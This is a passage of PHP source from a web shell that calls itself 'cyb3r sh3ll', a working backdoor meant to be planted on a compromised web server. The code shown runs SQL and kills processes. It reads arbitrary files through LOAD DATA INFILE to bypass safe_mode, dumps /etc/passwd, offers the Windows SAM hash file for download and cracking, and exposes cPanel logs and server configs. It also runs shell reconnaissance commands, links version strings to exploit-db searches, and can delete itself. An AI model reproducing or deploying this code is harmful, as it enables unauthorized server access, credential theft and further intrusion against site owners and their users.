2803 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#15354c borderColorLight=#15354c border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
2804
2805 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
2806
2807 echo "</table>";
2808
2809 mysql_free_result($result);
2810
2811 }
2812
2813 if ($sql_act == "processes")
2814
2815 {
2816
2817 if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
2818
2819 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
2820
2821 echo "<center><b>Processes:</b><br><br>";
2822
2823 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#15354c borderColorLight=#15354c border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
2824
2825 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
2826
2827 echo "</table>";
2828
2829 mysql_free_result($result);
2830
2831 }
2832
2833 if ($sql_act == "getfile")
2834
2835 {
2836
2837 $tmpdb = $sql_login."_tmpdb";
2838
2839 $select = mysql_select_db($tmpdb);
2840
2841 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
2842
2843 if ($select)
2844
2845 {
2846
2847 $created = FALSE;
2848
2849 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
2850
2851 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
2852
2853 $result = mysql_query("SELECT * FROM tmp_file;");
2854
2855 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
2856
2857 else
2858
2859 {
2860
2861 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
2862
2863 $f = "";
2864
2865 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
2866
2867 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
2868
2869 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
2870
2871 mysql_free_result($result);
2872
2873 mysql_query("DROP TABLE tmp_file;");
2874
2875 }
2876
2877 }
2878
2879 mysql_drop_db($tmpdb); //comment it if you want to leave database
2880
2881 }
2882
2883 }
2884
2885 }
2886
2887 }
2888
2889 echo "</td></tr></table>";
2890
2891 if ($sql_sock)
2892
2893 {
2894
2895 $affected = @mysql_affected_rows($sql_sock);
2896
2897 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
2898
2899 echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
2900
2901 }
2902
2903 echo "</table>";
2904
2905}
2906
2907if ($act == "mkdir")
2908{
2909
2910 if ($mkdir != $d)
2911 {
2912
2913 if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
2914
2915 elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
2916
2917 echo "<br><br>";
2918
2919 }
2920
2921 $act = $dspact = "ls";
2922
2923}
2924
2925if ($act == "d")
2926
2927{
2928
2929 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
2930
2931 else
2932
2933 {
2934
2935 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
2936
2937 if (!$win)
2938
2939 {
2940
2941 echo "<tr><td><b>Owner/Group</b></td><td> ";
2942
2943 $ow = posix_getpwuid(fileowner($d));
2944
2945 $gr = posix_getgrgid(filegroup($d));
2946
2947 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
2948
2949 }
2950
2951 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
2952
2953 }
2954
2955}
2956
2957
2958if ($act == "security")
2959{
2960
2961 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
2962
2963 if (!$win)
2964
2965 {
2966
2967 if ($nixpasswd)
2968
2969 {
2970
2971 if ($nixpasswd == 1) {$nixpasswd = 0;}
2972
2973 echo "<b>*nix /etc/passwd:</b><br>";
2974
2975 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
2976
2977 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
2978
2979 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
2980
2981 $i = $nixpwd_s;
2982
2983 while ($i < $nixpwd_e)
2984
2985 {
2986
2987 $uid = posix_getpwuid($i);
2988
2989 if ($uid)
2990
2991 {
2992
2993 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
2994
2995 echo join(":",$uid)."<br>";
2996
2997 }
2998
2999 $i++;
3000
3001 }
3002
3003 }
3004
3005 else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
3006
3007 }
3008
3009 else
3010 {
3011 $v = $_SERVER["WINDIR"]."\repair\sam";
3012
3013 if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
3014
3015 else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
3016 }
3017
3018 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
3019
3020 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
3021
3022 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
3023
3024 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
3025
3026 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
3027
3028 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
3029
3030 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
3031
3032 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
3033
3034 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
3035
3036 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
3037
3038 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
3039
3040 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
3041
3042 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
3043
3044 displaysecinfo("RAM",myshellexec("free -m"));
3045
3046 displaysecinfo("HDD space",myshellexec("df -h"));
3047
3048 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
3049
3050 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
3051
3052 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
3053
3054 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
3055
3056 displaysecinfo("Is links installed?",myshellexec("which links"));
3057
3058 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
3059
3060 displaysecinfo("Is GET installed?",myshellexec("which GET"));
3061
3062 displaysecinfo("Is perl installed?",myshellexec("which perl"));
3063
3064 displaysecinfo("Where is apache",myshellexec("whereis apache"));
3065
3066 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
3067
3068 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
3069
3070 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
3071
3072 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
3073
3074 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
3075
3076}
3077
3078if ($act == "mkfile")
3079
3080{
3081 if ($mkfile != $d)
3082
3083 {
3084 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
3085
3086 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
3087
3088 else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
3089
3090 }
3091 else {$act = $dspact = "ls";}
3092
3093}
3094
3095if ($act == "encoder")
3096
3097{
3098 echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
3099
3100 foreach(array("md5","crypt","sha1","crc32") as $v)
3101
3102 {
3103 echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
3104 }
3105
3106 echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
3107
3108 <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
3109
3110 <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
3111
3112 echo "<center>base64_decode - ";
3113
3114 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
3115
3116 else
3117
3118 {
3119
3120 $debase64 = base64_decode($encoder_input);
3121
3122 $debase64 = str_replace("\0","[0]",$debase64);
3123
3124 $a = explode("\r\n",$debase64);
3125
3126 $rows = count($a);
3127
3128 $debase64 = htmlspecialchars($debase64);
3129
3130 if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
3131
3132 else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
3133
3134 echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
3135
3136 }
3137
3138 echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
3139
3140 $c = strlen($encoder_input);
3141
3142 for($i=0;$i<$c;$i++)
3143
3144 {
3145 $hex = dechex(ord($encoder_input[$i]));
3146
3147 if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
3148
3149 elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
3150 }
3151
3152 echo "\" readonly><br></center></form>";
3153
3154}
3155
3156if ($act == "selfremove")
3157{
3158 if (($submit == $rndcode) and ($submit != ""))
3159
3160 {
3161
3162 if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); }
3163
3164 else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
3165
3166 }
3167
3168 else
3169
3170 {
3171
3172 if (!empty($rndcode)) {echo "<b>Error: Incorrect Confimation!</b>";}
3173
3174 $rnd = rand(0,9).rand(0,9).rand(0,9);
3175
3176 echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
3177
3178 }
3179
3180}
3181
3182if ($act == "serverinfo")
3183{
3184
3185global $windows,$disablefunctions,$safemode;
3186$cwd= getcwd();
3187$mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";
3188$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
3189if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
3190$osver=$tsize=$fsize='';
3191if ($windows){
3192$osver = " (".shelL("ver").")";
3193$sysroot = shelL("echo %systemroot%");
3194if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
3195if (empty($sysroot)) $sysroot = getenv("windir");
3196if (empty($sysroot)) $sysroot = "Not Found";
3197if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
3198for ($i=66;$i<=90;$i++){
3199$drive= chr($i).':\\';
3200if (is_dir($drive)){
3201$fsize+=@disk_free_space($drive);
3202$tsize+=@disk_total_space($drive);
3203}
3204}
3205}else{
3206$fsize=disk_free_space('/');
3207$tsize=disk_total_space('/');
3208}
3209$disksize="Used Space: ". showsizE($tsize-$fsize) . " Free Space: ". showsizE($fsize) . " Total Space: ". showsizE($tsize);
3210if (empty($CPU)) $CPU = "Unknown";
3211$os = php_unamE();
3212$osn=php_unamE('s');
3213if(!$windows){
3214$ker = php_unamE('r');
3215$o=($osn=="Linux")?"Linux+Kernel":$osn;
3216$os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);
3217$os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);
3218$inpa=':';
3219}else{
3220$sam = $sysroot."\\system32\\config\\SAM";
3221$inpa=';';
3222$os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);
3223}
3224$software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);
3225echo "
3226<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\" >
3227 <tr><td><b>Server information:</b></td></tr>
3228 <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>
3229 <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];
3230if (!empty($_SERVER["SERVER_ADDR"])){
3231 echo "(". $_SERVER["SERVER_ADDR"] .")";}
3232echo "
3233</td></tr>
3234<tr><td width=\"25%\" >Operation System:</td> <td >$os$osver</td></tr>
3235<tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td> <td bgcolor=\"#666666\">$software</td></tr>
3236<tr><td width=\"25%\" >CPU:</td> <td >$CPU</td></tr>
3237 <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>
3238<tr><td width=\"25%\" >User domain:</td><td >";
3239if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];
3240else echo "Unknown";
3241echo "
3242</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>
3243<td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();
3244else echo "Unknown"; echo "</td></tr>";
3245if ($windows){
3246echo "
3247<tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>
3248<td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";
3249if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">
3250<font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";
3251}
3252else
3253{
3254echo "<tr><td width=\"25%\" >Passwd file:</td><td >";
3255if (is_readable('/etc/passwd')) echo "
3256<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
3257if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";
3258echo "</td></tr>";
3259}
3260$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
3261echo "
3262<tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>
3263<td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a>
3264(<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>
3265<tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>
3266<td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";
3267else echo "Not Found";echo "</td>
3268<tr><td width=\"25%\" >Include path:</td>
3269<td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>
3270<tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>
3271<td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";
3272echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";
3273if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>
3274<tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>
3275<tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>
3276<tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>
3277<td bgcolor=\"#666666\">";$sq="";
3278if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";
3279if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";
3280if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";
3281if(function_exists('sqlite_open')) $sq.= " SQLite ";
3282if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";
3283if(function_exists('msql_connect')) $sq.= " mSQL ";
3284if(function_exists('mysqli_connect'))$sq.= " MySQLi ";
3285if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";
3286if ($sq=="") $sq= "Nothing";
3287
3288echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";
3289if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";
3290
3291}
3292
3293if ($act == "clientinfo")
3294{
3295echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";
3296}
3297
3298if ($act == "processes")
3299
3300{
3301
3302 echo "<b>Processes:</b><br>";
3303
3304 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
3305
3306 else {$handler = "tasklist";}
3307
3308 $ret = myshellexec($handler);
3309
3310 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
3311
3312 else
3313
3314 {
3315
3316 if (empty($processes_sort)) {$processes_sort = $sort_default;}
3317
3318 $parsesort = parsesort($processes_sort);
3319
3320 if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
3321
3322 $k = $parsesort[0];
3323
3324 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3325
3326 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3327
3328 $ret = htmlspecialchars($ret);
3329
3330 if (!$win)
3331
3332 {
3333
3334 if ($pid)
3335
3336 {
3337
3338 if (is_null($sig)) {$sig = 9;}
3339
3340 echo "Sending signal ".$sig." to #".$pid."... ";
3341
3342 if (posix_kill($pid,$sig)) {echo "OK.";}
3343
3344 else {echo "ERROR.";}
3345
3346 }
3347
3348 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
3349
3350 $stack = explode("\n",$ret);
3351
3352 $head = explode(" ",$stack[0]);
3353
3354 unset($stack[0]);
3355
3356 for($i=0;$i<count($head);$i++)
3357
3358 {
3359
3360 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
3361
3362 }
3363
3364 $prcs = array();
3365
3366 foreach ($stack as $line)
3367
3368 {
3369
3370 if (!empty($line))
3371
3372{
3373
3374 echo "<tr>";
3375
3376 $line = explode(" ",$line);
3377
3378 $line[10] = join(" ",array_slice($line,10));
3379
3380 $line = array_slice($line,0,11);
3381
3382 if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
3383
3384 $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
3385
3386 $prcs[] = $line;
3387
3388 echo "</tr>";
3389
3390 }
3391
3392 }
3393
3394 }
3395
3396 else
3397
3398 {
3399
3400 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3401
3402 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3403
3404 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3405
3406 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3407
3408 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3409
3410 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3411
3412 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3413
3414 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3415
3416 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3417
3418 while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
3419
3420 while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
3421
3422 $ret = convert_cyr_string($ret,"d","w");
3423
3424 $stack = explode("\n",$ret);
3425
3426 unset($stack[0],$stack[2]);
3427
3428 $stack = array_values($stack);
3429
3430 $head = explode("",$stack[0]);
3431
3432 $head[1] = explode(" ",$head[1]);
3433
3434 $head[1] = $head[1][0];
3435
3436 $stack = array_slice($stack,1);
3437
3438 unset($head[2]);
3439
3440 $head = array_values($head);
3441
3442 if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3443
3444 else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
3445
3446 if ($k > count($head)) {$k = count($head)-1;}
3447
3448 for($i=0;$i<count($head);$i++)
3449
3450 {
3451
3452 if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
3453
3454 }
3455
3456 $prcs = array();
3457
3458 foreach ($stack as $line)
3459
3460 {
3461
3462 if (!empty($line))
3463
3464 {
3465
3466 echo "<tr>";
3467
3468 $line = explode("",$line);
3469
3470 $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
3471
3472 $line[2] = intval(str_replace(" ","",$line[2]))*1024;
3473
3474 $prcs[] = $line;
3475
3476 echo "</tr>";
3477
3478 }
3479
3480 }
3481
3482 }
3483
3484 $head[$k] = "<b>".$head[$k]."</b>".$y;
3485
3486 $v = $processes_sort[0];
3487
3488 usort($prcs,"tabsort");
3489
3490 if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
3491
3492 $tab = array();
3493
3494 $tab[] = $head;
3495
3496 $tab = array_merge($tab,$prcs);
3497
3498 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
3499
3500 foreach($tab as $i=>$k)
3501
3502 {
3503
3504 echo "<tr>";
3505
3506 foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
3507
3508 echo "</tr>";
3509
3510 }
3511
3512 echo "</table>";
3513
3514 }
3515
3516}
3517
3518if ($act == "ls")
3519{
3520 if (count($ls_arr) > 0) {$list = $ls_arr;}
3521 else
3522 {
3523
3524 $list = array();
3525
3526 if ($h = @opendir($d))
3527
3528 {
3529
3530 while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
3531
3532 closedir($h);
3533
3534 }
3535
3536 else {}
3537
3538 }
3539
3540 if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
3541 else
3542 {
3543
3544 //Building array
3545
3546 $objects = array();
3547
3548 $vd = "f"; //Viewing mode
3549
3550 if ($vd == "f")
3551
3552 {
3553
3554 $objects["head"] = array();
3555
3556 $objects["folders"] = array();
3557
3558 $objects["links"] = array();
3559
3560 $objects["files"] = array();
3561
3562 foreach ($list as $v)
3563
3564 {
3565
3566 $o = basename($v);
3567
3568 $row = array();
3569
3570 if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
3571
3572 elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
3573
3574 elseif (is_dir($v))
3575
3576 {
3577
3578 if (is_link($v)) {$type = "LINK";}
3579
3580 else {$type = "DIR";}
3581
3582 $row[] = $v;
3583
3584 $row[] = $type;
3585
3586 }
3587
3588 elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
3589
3590 $row[] = filemtime($v);
3591
3592 if (!$win)
3593
3594 {
3595
3596 $ow = posix_getpwuid(fileowner($v));
3597
3598 $gr = posix_getgrgid(filegroup($v));
3599
3600 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
3601
3602 }
3603
3604 $row[] = fileperms($v);
3605
3606 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
3607
3608 elseif (is_link($v)) {$objects["links"][] = $row;}
3609
3610 elseif (is_dir($v)) {$objects["folders"][] = $row;}
3611
3612 elseif (is_file($v)) {$objects["files"][] = $row;}
3613
3614 $i++;
3615
3616 }
3617
3618 $row = array();
3619
3620 $row[] = "<b>Name</b>";
3621
3622 $row[] = "<b>Size</b>";
